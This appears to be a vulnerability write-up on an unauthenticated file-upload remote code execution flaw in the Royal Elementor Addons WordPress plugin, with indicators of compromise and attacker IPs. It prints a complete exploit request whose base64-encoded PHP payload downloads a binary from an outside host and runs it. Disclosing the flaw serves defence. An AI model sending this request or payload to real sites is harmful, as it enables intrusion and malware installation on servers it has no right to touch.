The Royal Elementor Addons and Templates WordPress plugin provides themes and templates to make your WordPress site aesthetically pleasing with little effort. With over 200,000 installations it is quite popular making it a fantastic target for opportunistic attackers.

Versions prior to 1.3.79 are vulnerable to a file upload vulnerability which results in code execution as the user running the WordPress site. Once a WordPress site is configured to use the Addon the following action wpr_addons_upload_file listens for input on the /wp-admin/admin-ajax.php endpoint and is envokeable via a POST request. The action is accessible without authentication and fails to properly sanitize incoming file types. The endpoint won’t allow you to upload the .php file type however if you upload a PHP payload with the filetype .ph$p it bypasses the sanitization mechanism and allows you to drop a payload on the target.

Exploitation of the vulnerability is demonstrated in the following POST request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.docksal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Content-Type: multipart/form-data; boundary=---------------------------612499444778935602855148342223
Content-Length: 1078

-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="uploaded_file"; filename="WmrRA8wI.ph$p"
Content-Type: application/octet-stream

<?php system(base64_decode('Y3VybCAtc28gLi92RVNIVllzd0p2dyBodHRwOi8vMTcyLjE2LjE5OS4xMzc6ODA4MC9rQW9vd3NKYnpVRER3X2FDbFg4RDhnOyBjaG1vZCAreCAuL3ZFU0hWWXN3SnZ3OyAuL3ZFU0hWWXN3SnZ3ICY='));?>
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="action"

wpr_addons_upload_file
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="max_file_size"

6395
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="allowed_file_types"

ph$p
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="triggering_event"

click
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="wpr_addons_nonce"

aa1b436f01
-----------------------------612499444778935602855148342223--

This has been actively exploited in the wild for a while now with the first signs of exploitation dating back to December 2019.

IOCs

Malicious adversaries have been identified dropping reverse shells in the following two filenames:

b1ack.p$hp with md5sum: 1635f34d9c1da30ff5438e06d3ea6590
wp.ph$p with md5sum: ​​bac83f216eba23a865c591dbea427f22

That being said, I would be suspicious of any .ph$p file if the Royal Elementor Addons and Template plugin was being used in my WordPress site.

*Note: Updating the plugin to the patched version 1.3.79 won’t remove malicious payloads dropped by an attacker – so be sure to scan for unwanted footholds after patching.

The majority of the attacks appear to be coming from the following three IP Addresses:

65[.]21.22.78
2a01[:]4f9:3080:4eea::2
135[.]181.181.50

Attacker Value and Exploitation

• This is super easy to exploit.
  
• It’s an unauth RCE in an internet facing application with +200,000 active installations (it’s a big deal)
  
• Exploited in the wild
  
• The only reason I’d give it a 4/5 for Attack Value is because it doesn’t give privileged access.